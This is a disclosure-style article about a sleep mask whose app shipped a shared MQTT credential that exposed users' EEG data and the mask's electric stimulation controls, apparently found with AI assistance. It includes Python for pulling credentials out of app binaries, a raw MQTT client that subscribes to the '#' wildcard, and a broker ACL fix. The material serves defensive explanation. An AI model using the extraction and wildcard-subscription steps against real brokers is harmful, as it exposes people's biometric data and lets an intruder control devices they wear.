A Kickstarter-funded smart sleep mask with EEG capabilities was found broadcasting users' brainwaves to an open MQTT broker, allowing unauthorized access to sensitive biometric data and even the ability to send electric impulses to sleeping users.
A Kickstarter-funded smart sleep mask turned out to carry a security flaw that exposed users' brainwave data to anyone holding the companion app's embedded credentials, and let the same party send electric impulses to the mask while its wearer slept. The device, made by a small Chinese research company, combines EEG brain monitoring, electrical muscle stimulation, vibration, heating, and audio in a single wearable.
Discovery Through Reverse Engineering
The security researcher, who wishes to remain anonymous, initially purchased the mask to address connectivity issues with the official app. What began as a simple attempt to build a custom control panel quickly evolved into a comprehensive security audit.
Using Claude AI (Opus 4.6), the researcher first attempted to reverse-engineer the Bluetooth Low Energy protocol. After scanning for nearby BLE devices and mapping the GATT interface, they found two characteristics: one for writing commands and one that streams data back. Hundreds of guessed command patterns, including Modbus frames, JSON, and assorted byte layouts, got no response; the protocol could not be recovered blind from the radio side.
The App Analysis Breakthrough
The real breakthrough came from analyzing the Android application. Built with Flutter, the app presented an unusual obstacle: Flutter release builds compile Dart source ahead of time into native ARM64 machine code rather than the Dalvik bytecode of a conventional Java or Kotlin app, so the usual Java decompilers cannot recover it. The compiled binary still contained readable strings, however.
Among thousands of lines of Flutter framework noise, the researcher discovered:
- Hardcoded credentials for the company's MQTT message broker (shared across all app installations)
- Cloud API endpoints
- Fifteen command builder function names for controlling various features
- Protocol debug messages revealing packet structure
Using blutter, an open-source tool built specifically for decompiling Flutter's AOT Dart snapshots, the researcher reconstructed the functions with readable annotations and mapped out all fifteen commands.
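As an added illustration, not code from the researcher or the vendor, the following Python script performs the kind of string triage described above over a constructed byte blob standing in for a Flutter libapp.so. Every string in the blob (broker URL, credential pair, command-builder names, debug format) is invented for the example; the extraction and classification rules are the part worth keeping.

```python
import re
import string

# Constructed stand-in for the data section of a Flutter libapp.so: printable runs
# separated by NUL bytes and binary noise. Every name and value here is invented
# for the example and is not the real product's string table.
SAMPLE_BINARY = (
    b"\x00\x01\x7fELF\x00" + b"dart:core\x00" + b"package:flutter/widgets.dart\x00"
    + b"mqtt://broker.example-iot.test:1883\x00"
    + b"mqttUser=mask_app\x00" + b"mqttPass=Sup3rS3cret!\x00"
    + b"https://api.example-iot.test/v1/device/bind\x00"
    + b"buildEmsCommand\x00" + b"buildHeatCommand\x00" + b"buildVibrateCommand\x00"
    + b"buildAudioCommand\x00"
    + b"[proto] tx frame: hdr=0xAA len=%d cmd=0x%02x\x00"
    + b"\x12\x34\xff\xfe" + b"setState\x00"
)

MIN_LEN = 6
# Printable ASCII plus space; tabs and newlines end a run like `strings` does.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def extract_strings(blob: bytes, min_len: int = MIN_LEN) -> list[str]:
    """Return printable runs of at least min_len bytes, like the `strings` tool."""
    out, cur = [], bytearray()
    for b in blob:
        if b in PRINTABLE:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            out.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


# (label, regex). The credential rule keys on names, not value shapes, because
# a password in a string table looks like any other short string.
RULES = [
    ("mqtt_endpoint", re.compile(r"\b(?:mqtts?|wss?)://[\w.-]+(?::\d+)?", re.I)),
    ("http_endpoint", re.compile(r"\bhttps?://[\w.-]+/\S*", re.I)),
    ("credential", re.compile(r"(?:pass(?:word|wd)?|secret|token|user(?:name)?)\s*[=:]\s*\S+", re.I)),
    ("command_builder", re.compile(r"\bbuild[A-Z]\w*Command\b")),
    ("proto_debug", re.compile(r"\b(?:frame|hdr|cmd|payload|crc)\b.*(?:0x|%d|%02x)", re.I)),
]


def triage(blob: bytes) -> dict[str, list[str]]:
    """Bucket extracted strings by rule; a string may land in more than one bucket."""
    hits: dict[str, list[str]] = {label: [] for label, _ in RULES}
    for s in extract_strings(blob):
        for label, rx in RULES:
            if rx.search(s):
                hits[label].append(s)
    return hits


if __name__ == "__main__":
    for label, items in triage(SAMPLE_BINARY).items():
        for item in items:
            print(f"{label:16} {item}")
```

On a real libapp.so the same rules produce a short list out of tens of thousands of framework strings; anything that lands in the credential or endpoint buckets is what to try first against the backend, exactly the path the researcher followed.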
The MQTT Security Breach
With the hardcoded credentials, connecting to the company's MQTT broker was trivial. MQTT (Message Queuing Telemetry Transport) is the lightweight publish/subscribe protocol standard in IoT deployments: devices publish sensor readings to topics and subscribe to topics that carry commands. Unless the broker enforces per-client topic permissions, any client it accepts can subscribe to the wildcard topic "#" and receive every message the broker relays.
Once connected, the researcher discovered they weren't just receiving data from their own device - they were receiving data from approximately 25 active devices worldwide. The exposed data included:
- Live EEG brainwave data from sleep masks
- Air quality monitor readings (temperature, humidity, CO2)
- Presence sensor data detecting room occupancy
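The exchange described above, as an added example that is not part of the original report: a minimal MQTT 3.1.1 client side written in Python without a client library, so the bytes on the wire are visible. The credentials, client id, topic layout and payloads are constructed for the example. The point is that one CONNECT carrying the shared username and password plus one SUBSCRIBE for "#" is the entire "attack", and that over plain TCP (no TLS) the password itself crosses the wire in clear.

```python
import struct

# Constructed stand-ins for the credential pair shipped inside the app.
# Invented for this example, not the real vendor's values.
SHARED_USER = "mask_app"
SHARED_PASS = "Sup3rS3cret!"


def _varint(n: int) -> bytes:
    """Encode an MQTT 'remaining length' (7 bits per byte, 0x80 = more follows)."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        if n:
            byte |= 0x80
        out.append(byte)
        if not n:
            return bytes(out)


def _decode_varint(buf: bytes, i: int) -> tuple[int, int]:
    """Decode a remaining-length field at buf[i]; return (value, index after it)."""
    value, mult = 0, 1
    while True:
        byte = buf[i]
        i += 1
        value += (byte & 0x7F) * mult
        if not byte & 0x80:
            return value, i
        mult *= 128
        if mult > 128 ** 3:
            raise ValueError("malformed remaining length")


def _utf8(s: str) -> bytes:
    """MQTT string: big-endian 16-bit length prefix followed by UTF-8 bytes."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def connect_packet(client_id: str, username: str, password: str, keepalive: int = 60) -> bytes:
    """MQTT 3.1.1 CONNECT with username, password and clean-session flags set."""
    flags = 0x80 | 0x40 | 0x02  # username present, password present, clean session
    var_header = _utf8("MQTT") + bytes([0x04, flags]) + struct.pack(">H", keepalive)
    payload = _utf8(client_id) + _utf8(username) + _utf8(password)
    body = var_header + payload
    return bytes([0x10]) + _varint(len(body)) + body


def subscribe_packet(packet_id: int, topic_filter: str, qos: int = 0) -> bytes:
    """MQTT 3.1.1 SUBSCRIBE for one filter; fixed-header flags must be 0b0010."""
    body = struct.pack(">H", packet_id) + _utf8(topic_filter) + bytes([qos])
    return bytes([0x82]) + _varint(len(body)) + body


def connack_accepted(frame: bytes) -> bool:
    """True if a CONNACK carries return code 0 (connection accepted)."""
    return len(frame) == 4 and frame[0] == 0x20 and frame[3] == 0x00


def parse_publish(frame: bytes) -> tuple[str, bytes]:
    """Decode a PUBLISH of any QoS into (topic, payload)."""
    if frame[0] >> 4 != 3:
        raise ValueError("not a PUBLISH packet")
    qos = (frame[0] >> 1) & 0x03
    remaining, i = _decode_varint(frame, 1)
    end = i + remaining
    (topic_len,) = struct.unpack(">H", frame[i:i + 2])
    i += 2
    topic = frame[i:i + topic_len].decode("utf-8")
    i += topic_len
    if qos:
        i += 2  # packet identifier is present only for QoS 1 and 2
    return topic, frame[i:end]


def publish_packet(topic: str, payload: bytes) -> bytes:
    """QoS 0 PUBLISH, as a broker forwards another device's message to a subscriber."""
    body = _utf8(topic) + payload
    return bytes([0x30]) + _varint(len(body)) + body


# Constructed traffic: what a client that sent CONNECT + SUBSCRIBE "#" reads back from
# a broker that grants the shared credential every topic. Topics and payloads invented.
BROKER_CONNACK = bytes([0x20, 0x02, 0x00, 0x00])
BROKER_SUBACK = bytes([0x90, 0x03, 0x00, 0x01, 0x00])
FORWARDED = [
    publish_packet("devices/mask-0042/eeg", b"\x7f\x02\x11\x80"),
    publish_packet("devices/mask-1337/eeg", b"\x00\x55\x3a\x10"),
    publish_packet("devices/aq-0007/env", b'{"co2":812,"rh":41}'),
]


def collect(frames: list[bytes]) -> dict[str, bytes]:
    """What a '#' subscriber sees: every device's topic, not only its own."""
    return dict(parse_publish(f) for f in frames)


if __name__ == "__main__":
    print(connect_packet("audit", SHARED_USER, SHARED_PASS).hex(" "))
    print(subscribe_packet(1, "#").hex(" "))
    assert connack_accepted(BROKER_CONNACK)
    for topic, payload in collect(FORWARDED).items():
        print(topic, payload)
```

Pointed at a real broker, the three packets above are all a client needs to send; the broker's subsequent PUBLISH stream is what the researcher saw. Whether a given client sees other devices' topics is decided entirely by the broker's authorization policy, which is where the fix belongs.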
Analysis of the brainwave data revealed distinct sleep stages. One user appeared to be in REM sleep, showing mixed-frequency activity, while another was in deep slow-wave sleep with strong delta power below 4 Hz.
The Electric Stimulation Vulnerability
Perhaps most concerning was the discovery that the same credentials that exposed brainwave data also granted control over the mask's electrical muscle stimulation (EMS) feature. The EMS command accepts parameters for mode, frequency, intensity, and duration, meaning anyone holding the shared credentials could potentially send electric impulses to sleeping users.
Technical Implementation
The researcher successfully built a web dashboard with sliders controlling all mask functions, demonstrating complete control over the devices. The reverse engineering process, from Bluetooth analysis to MQTT discovery, was accomplished in approximately 30 minutes using Claude AI.
Disclosure and Implications
The researcher has reported the issues to the company but has chosen not to publicly name the product or company at this time. The incident is a reminder that a secret shipped inside a client app is, for practical purposes, published: anyone who can read the binary holds it.
The case highlights several critical security failures:
- Shared Credentials: one MQTT username and password baked into every copy of the app, so every user, and anyone who extracts the app, holds the same key
- Unsecured Broker: no per-client authentication or topic-level access control behind that shared credential, and no encryption on the MQTT connection
- Sensitive Data Exposure: biometric data published to topics that any accepted client could read
- Bidirectional Control: command topics writable by any accepted client, so the credential that reads EEG also drives the EMS output
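What the broker-side fix looks like, as an added example rather than anything the vendor is known to have deployed: per-device principals with topic-level permissions, evaluated with MQTT's own wildcard semantics so that a subscription to "#" is refused unless a policy actually grants that scope. The topic layout ("devices/<id>/eeg", ".../cmd") and the principal names are assumptions for the example; the matching rules follow the MQTT 3.1.1 specification.

```python
# Constructed per-device policy. Topic layout and principal names are assumptions
# for the example, not the vendor's scheme. Each device publishes only its own
# telemetry and reads only its own command topic; its paired app gets the inverse.
ACL = {
    "mask-0042": {
        "publish": ["devices/mask-0042/eeg", "devices/mask-0042/status"],
        "subscribe": ["devices/mask-0042/cmd"],
    },
    "app-for-mask-0042": {
        "publish": ["devices/mask-0042/cmd"],
        "subscribe": ["devices/mask-0042/+"],
    },
}


def topic_matches(filter_: str, topic: str) -> bool:
    """MQTT 3.1.1 matching: '+' matches one level, '#' all remaining levels.
    Wildcards never match topics beginning with '$' (reserved for the broker)."""
    if topic.startswith("$") and filter_[:1] in ("+", "#"):
        return False
    f, t = filter_.split("/"), topic.split("/")
    for i, part in enumerate(f):
        if part == "#":
            return i == len(f) - 1  # '#' is only legal as the last level
        if i >= len(t):
            return False
        if part != "+" and part != t[i]:
            return False
    return len(f) == len(t)


def filter_covers(allowed: str, requested: str) -> bool:
    """True if every topic the requested filter could match is also matched by the
    allowed pattern, so granting the subscription leaks nothing beyond the policy."""
    a, r = allowed.split("/"), requested.split("/")
    for i, part in enumerate(a):
        if part == "#":
            return i == len(a) - 1
        if i >= len(r) or r[i] == "#":
            return False  # requested scope reaches beyond the allowed one
        if part != "+" and r[i] != part:
            return False  # a requested '+' against an allowed literal also fails
    return len(a) == len(r)


def authorize(principal: str, action: str, target: str) -> bool:
    """Broker-side decision: publish to a topic, or subscribe to a filter."""
    rules = ACL.get(principal, {}).get(action, [])
    if action == "publish":
        return any(topic_matches(rule, target) for rule in rules)
    if action == "subscribe":
        return any(filter_covers(rule, target) for rule in rules)
    return False


def evaluate(requests: list[tuple[str, str, str]]) -> dict[tuple[str, str, str], bool]:
    """Decide a batch of (principal, action, target) requests."""
    return {req: authorize(*req) for req in requests}


if __name__ == "__main__":
    decisions = evaluate([
        ("mask-0042", "publish", "devices/mask-0042/eeg"),
        ("mask-0042", "subscribe", "#"),
        ("app-for-mask-0042", "subscribe", "devices/mask-0042/eeg"),
        ("app-for-mask-0042", "publish", "devices/mask-1337/cmd"),
        ("mask-1337", "subscribe", "devices/+/eeg"),
    ])
    for (who, what, where), ok in decisions.items():
        print(f"{'ALLOW' if ok else 'DENY':5} {who} {what} {where}")
```

Two details matter in practice. First, the subscribe check is not plain topic matching: a broker that tests the requested filter as if it were a topic will happily grant "devices/+/eeg" against a rule for one device, so the check must ask whether the allowed pattern covers everything the requested filter could match. Second, none of this helps while every client presents the same credential; per-device identity (unique credentials or client certificates issued at pairing) is the prerequisite that makes the principal column of the policy meaningful.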
The exposure is not limited to the sleep masks: the air-quality and presence sensors seen in the same session show that everything the vendor put on that broker shares the same fate. The ability to monitor, and potentially influence, users' sleep through brainwave data and electric stimulation is a serious privacy and safety concern.
As AI-assisted reverse engineering becomes more accessible, robust security practices in IoT devices matter more, not less. This case shows how quickly a determined researcher can find and exploit weaknesses even in a relatively complex system that combines multiple wireless protocols and biometric sensors.
